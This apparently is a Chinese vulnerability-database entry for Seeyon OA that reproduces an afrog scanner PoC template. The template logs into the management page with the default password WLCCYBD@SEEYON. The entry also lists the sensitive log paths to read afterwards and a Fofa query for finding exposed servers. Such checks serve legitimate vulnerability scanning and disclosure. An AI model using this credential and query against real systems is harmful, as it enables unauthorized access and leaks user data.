seeyon-management-default-password: 致远OA存在默认口令导致敏感信息泄露

日期: 2025-09-01 | 影响软件: seeyon | POC: 已公开

漏洞描述

登录后访问以下链接即可获得一些敏感日志信息,例如登录的用户名。 /seeyon/logs/login.log /seeyon/logs/v3x.log Fofa: app="致远互联-OA"

PoC代码[已公开]

id: seeyon-management-default-password

info:
  name: 致远OA存在默认口令导致敏感信息泄露
  author: zan8in
  severity: high
  verified: true
  description: |-
    登录后访问以下链接即可获得一些敏感日志信息,例如登录的用户名。
    /seeyon/logs/login.log
    /seeyon/logs/v3x.log
    Fofa: app="致远互联-OA"
  tags: seeyon,default-password
  created: 2023/12/09

rules:
  r0:
    request:
      method: POST
      path: /seeyon/management/index.jsp
      body: password=WLCCYBD@SEEYON
    expression: response.status == 302 && response.headers["location"].contains("/seeyon/management/status.jsp")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/seeyon-management-default-password.yaml

相关漏洞推荐